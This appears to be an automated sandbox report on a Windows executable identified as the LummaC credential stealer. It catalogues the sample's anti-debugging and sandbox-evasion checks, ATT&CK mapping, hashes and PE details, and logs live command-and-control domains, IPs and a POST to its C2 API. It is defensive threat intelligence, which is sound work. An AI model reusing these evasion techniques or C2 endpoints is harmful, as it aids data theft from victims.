      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11855D2 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FE8B32 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE8AD2 rdtsc 0_2_00FE8AD2
      Source: C:\Users\user\Desktop\file.exe TID: 5532Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: file.exe, file.exe, 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: file.exe, 00000000.00000002.2180597191.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: file.exe, 00000000.00000003.2180310098.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179066828.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2181184047.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: file.exe, 00000000.00000003.2180310098.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179066828.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2181184047.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
      Source: file.exe, 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
      Potentially malicious time measurement code found
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE8EA9 Start: 00FE8EAB End: 00FE8EAF0_2_00FE8EA9
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
      Source: C:\Users\user\Desktop\file.exeFile opened: SICE
      Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE8AD2 rdtsc 0_2_00FE8AD2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCB480 LdrInitializeThunk,0_2_00FCB480
      Source: file.exe, file.exe, 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Process Injection      		24
      Virtualization/Sandbox Evasion      		OS Credential Dumping641
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Process Injection      		LSASS Memory24
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information      		NTDS223
      System Information Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
      Software Packing      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      file.exe100%AviraTR/Crypt.XPACK.Gen
      file.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://atten-supporse.biz/apir100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      atten-supporse.biz
      		104.21.64.1
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        dare-curbys.bizfalse
          		high
          impend-differ.bizfalse
            		high
            zinc-sneark.bizfalse
              		high
              covery-mover.bizfalse
                		high
                formy-spill.bizfalse
                  		high
                  atten-supporse.bizfalse
                    		high
                    https://atten-supporse.biz/apifalse
                      		high
                      se-blurry.bizfalse
                        		high
                        print-vexer.bizfalse
                          		high
                          dwell-exclaim.bizfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://atten-supporse.biz:443/apifile.exe, 00000000.00000002.2180995646.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179066828.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://atten-supporse.biz/apirfile.exe, 00000000.00000003.2179066828.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2181217989.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://atten-supporse.biz/file.exe, 00000000.00000002.2181217989.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2181184047.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                104.21.64.1
                                		atten-supporse.bizUnited States
                                		13335CLOUDFLARENETUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1571894
                                Start date and time:2024-12-09 20:26:08 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 5s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@1/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.63
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                14:27:05API Interceptor2x Sleep call for process: file.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.21.64.1attachDocx.docxGet hashmaliciousUnknownBrowse
                                  Voicemail_+Transcription001799.docxGet hashmaliciousUnknownBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    atten-supporse.bizfile.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                    • 172.67.165.166
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 104.21.16.9
                                    8GHb2yuPOk.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                    • 104.21.16.9
                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 104.21.16.9
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                    • 104.21.16.9
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                    • 172.67.165.166

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUShttps://quiet-sun-5d9f.atmos4.workers.dev/loginGet hashmaliciousUnknownBrowse
                                    • 104.21.50.75
                                    attachDocx.docxGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    Play_VM-NowCRQW.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14
                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                    • 172.67.165.166
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    http://www.polarinsight.online/tbGet hashmaliciousUnknownBrowse
                                    • 172.67.166.58
                                    https://www.aarp.org/money/scams-fraud/info-2024/title-theft-real-estate-fraud.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 104.18.27.193
                                    http://xn--gmq700hb9ir4byxw.shop/bnBkL2ViZml0c2JwY0F7Zm1mdy9idWp0cHMkbHYvcGQvem1xanVtYnNmZC9xbmJ3MDA7dHF1dWkGet hashmaliciousReCaptcha PhishBrowse
                                    • 104.16.123.96
                                    https://webservice.ucampaign.unear.net/UmailTracking/t.aspx?p=64620006&c=MTI2NjMxOA==&up=46435316&e=jlim@vvblawyers.com&l=MTczODQ=&i=1126&u=aHR0cHM6Ly9zcGhleGFtcy5jb20vLndlbGwta25vdy8/MHM1N2RiPU1UTW1NVE1tTVRNbU1UTW1RakVtUmpRbWIySnhkRWN6SmtRMEprMTFiSGR5VkdoSGVVdFpMaTQ1U2pOWU5sSnlhbVk2Y2tZMEpqTXpKblY1Wm5VdWIyWmxaV3BwTXpNbVJUUW1kSFJpYldReE15WnZZbkYwUkRRbVFqRW1SalFtYlc1MWFVY3pKa1EwSmtJeEprWTBKbnBsY0dOSE15WkVOQ1pDTVNaR05DWjZaWEJqUkRRbVFqRW1SalFtWldKbWFVY3pKa1EwSmtJeEprWTBKbVp0ZW5WMFJ6TW1SRFFtTVRNbU1UTW1NVE1tTVRNbVFqRW1SVGdtTVRNbU1UTW1NVE1tTVRNbU1UTW1NVE1tTVRNbU1UTW1RakVtUXpRbWIyWmxaV3BwTVRNbVFqUW1lblZxYldwamFuUnFkekV6SmpFekpqRXpKakV6SmpFekpqRXpKakV6SmpFekpqRXpKakV6SmpFekpqRXpKa0l4SmtNMEptWjFhbWw0TVRNbVFqUW1jM0J0Y0dReE15WXhNeVl4TXlZeE15WXhNeVl4TXlZeE15WXhNeVl4TXlZeE15WXhNeVl4TXlaQ01TWkRPQ1l4TXlaMWVXWjFMbTltWldWcWFTOHhNeVl4TXlZeE15WXhNeVl4TXlZeE15WXhNeVl4TXlaQ01TWkdOQ1ptYlhwMWRFUTBKakV6SmpFekpqRXpKakV6SmtJeEprWTBKbVp0ZFdwMVJ6TW1SRFFtWm01d1NVWTBKbVp0ZFdwMVJEUW1NVE1tTVRNbU1UTW1NVE1tUWpFbVJ6TW1LekV6Sm1aek1UTW1aV1ZpTVRNbVJUUW1SVFFtUlRRbVJUUW1SVFFtUlRRbVJEUW1NVE1tSzBjekpqRXpKakV6SmtZMEpqTXpKa1UwSmpFelkyczJSR054UjFoamIwTkdaWHRYU0dWemVtZHNkSHBtYVdkdWMydGxhVFF6SmtjekptWnpSek1tWldSSE15WjRjRzlzTG0xdFpuZ3ZSek1tYUhOd0wyWnRZbTl3YW50aWIzTm1kVzlxYjJadVlrY3pKa2N6SmtJMEpuUnhkWFZwUlRRbWJYTjJRelFtTXpNekprVTBKblZ2Wm5WdmNHUXhNeVl6TXlacGRHWnpaMlp6TXpNbVJUUW1kMnAyY21ZdWNYVjFhVEV6Sm1KMVptNUVOQ1l4TXlZeE15WXhNeVl4TXlaQ01TWkdOQ1l6TXlZNUxrZFZWak16SmtVMEpuVm1kSE5pYVdReE15WmlkV1p1UkRRbU1UTW1NVE1tTVRNbU1UTW1RakVtUmpRbVpXSm1hVVEwSmtJeEprWTBKbTF1ZFdsRU5DWkNNU1pHTkNadlluRjBSek1tUkRRbVpHczNhRnBXUkRRbWRIczFUVVUwSmt4WWJYZ3hUMUZuWkZoUVdYTjdOWGRIT1h0UlJUWW1RMDlHTkNZek15WjFlV1oxTG05bVpXVnFhVE16SmtVMEpuUjBZbTFrTVRNbWIySnhkRVEwSmtJeEpnPT0=Get hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14
                                    https://shorturl.at/aRqLH/Get hashmaliciousUnknownBrowse
                                    • 104.26.8.129

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                    • 104.21.64.1
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.64.1
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.64.1
                                    SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 104.21.64.1
                                    8GHb2yuPOk.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                    • 104.21.64.1
                                    W7ZBbzV7A5.exeGet hashmaliciousUnknownBrowse
                                    • 104.21.64.1
                                    BPzptjK1aF.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.64.1
                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 104.21.64.1
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.64.1
                                    file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                    • 104.21.64.1

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.949435567437425
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:1'838'080 bytes
                                    MD5:1524da94feeebb2a921c3065f4da2383
                                    SHA1:68ad3edc97d668005f47ac76d5a0f8397d24b8cb
                                    SHA256:4228f1c544520402ca8d8120aca88167f1b23ccb2efb536fe668dc6dd0bc267c
                                    SHA512:46988b61b3b9ad9aebbd860c1b6a4bc2587e0726b498b2bcdf688e200471ea5b08cc68a7404e7d2d85f199ef498af455b9288d3612b842bdf13f7b3edbde2ea6
                                    SSDEEP:49152:2uKaMEpt/xkoQ63mK8d0GyeK9d00nlIUq8rAI8NSx9vZ:JXPxjQ63fO0GyeWAe3
                                    TLSH:84853365D9F0262ED9DAECB9F4B03387A71D94769010EF72130EF79C4A1F22736168A1
                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ug..............................H...........@...........................H......C....@.................................\@..p..

                                    File Icon

                                    Icon Hash:00928e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x88c000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6755B9EA [Sun Dec 8 15:23:22 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007FA1BCE2B93Ah
                                    pminsw mm3, qword ptr [ebx]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, ch
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    add byte ptr [ebx], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+00h], ah
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5405c0x70.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2b0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x520000x2420091b3b7183f823dda6c9a04793aa6b925False0.9976616565743944data7.98596751431181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x530000x2b00x400fe67bb2a9df3150b9c94de8bd81ed8a0False0.3603515625data5.186832724894366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x540000x10000x200f89f2f28be6f3fc6a464feb82ace12f3False0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x550000x29d0000x200f1d89832553d30b40cffe5ae532a9e33unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    rmyngibq0x2f20000x1990000x198c000b605c57e854bf5c9fd924805894e058False0.9944709241207951data7.954341436383283IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    qytqqcga0x48b0000x10000x4005550fb0a9c51005f306f0ac2df3d4168False0.73828125data5.841664746454803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0x48c0000x30000x22008f5ae207664cd86eb1b50812d61ea603False0.05135569852941176DOS executable (COM)0.5084886710722156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_MANIFEST0x530580x256ASCII text, with CRLF line terminators0.5100334448160535

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-09T20:27:03.000167+01002057921ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)1192.168.2.6557591.1.1.153UDP
                                    2024-12-09T20:27:04.558957+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649707104.21.64.1443TCP
                                    2024-12-09T20:27:04.558957+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707104.21.64.1443TCP
                                    2024-12-09T20:27:05.800239+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649707104.21.64.1443TCP
                                    2024-12-09T20:27:05.800239+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649707104.21.64.1443TCP
                                    2024-12-09T20:27:06.924921+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649709104.21.64.1443TCP
                                    2024-12-09T20:27:06.924921+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709104.21.64.1443TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 9, 2024 20:27:03.326483011 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:03.326533079 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:03.326611996 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:03.331871033 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:03.331883907 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:04.558870077 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:04.558957100 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:04.564418077 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:04.564440966 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:04.564748049 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:04.608902931 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:04.640795946 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:04.640825987 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:04.640974998 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:05.800259113 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:05.800347090 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:05.800422907 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:05.802997112 CET49707443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:05.803010941 CET44349707104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:05.853965998 CET49709443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:05.854024887 CET44349709104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:05.854125977 CET49709443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:05.854485989 CET49709443192.168.2.6104.21.64.1
                                    Dec 9, 2024 20:27:05.854499102 CET44349709104.21.64.1192.168.2.6
                                    Dec 9, 2024 20:27:06.924921036 CET49709443192.168.2.6104.21.64.1

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 9, 2024 20:27:03.000166893 CET5575953192.168.2.61.1.1.1
                                    Dec 9, 2024 20:27:03.308933973 CET53557591.1.1.1192.168.2.6

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 9, 2024 20:27:03.000166893 CET192.168.2.61.1.1.10xf171Standard query (0)atten-supporse.bizA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 9, 2024 20:27:03.308933973 CET1.1.1.1192.168.2.60xf171No error (0)atten-supporse.biz104.21.64.1A (IP address)IN (0x0001)false
                                    Dec 9, 2024 20:27:03.308933973 CET1.1.1.1192.168.2.60xf171No error (0)atten-supporse.biz104.21.16.1A (IP address)IN (0x0001)false
                                    Dec 9, 2024 20:27:03.308933973 CET1.1.1.1192.168.2.60xf171No error (0)atten-supporse.biz104.21.80.1A (IP address)IN (0x0001)false
                                    Dec 9, 2024 20:27:03.308933973 CET1.1.1.1192.168.2.60xf171No error (0)atten-supporse.biz104.21.96.1A (IP address)IN (0x0001)false
                                    Dec 9, 2024 20:27:03.308933973 CET1.1.1.1192.168.2.60xf171No error (0)atten-supporse.biz104.21.32.1A (IP address)IN (0x0001)false
                                    Dec 9, 2024 20:27:03.308933973 CET1.1.1.1192.168.2.60xf171No error (0)atten-supporse.biz104.21.112.1A (IP address)IN (0x0001)false
                                    Dec 9, 2024 20:27:03.308933973 CET1.1.1.1192.168.2.60xf171No error (0)atten-supporse.biz104.21.48.1A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • atten-supporse.biz

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649707104.21.64.14433508C:\Users\user\Desktop\file.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-09 19:27:04 UTC265OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
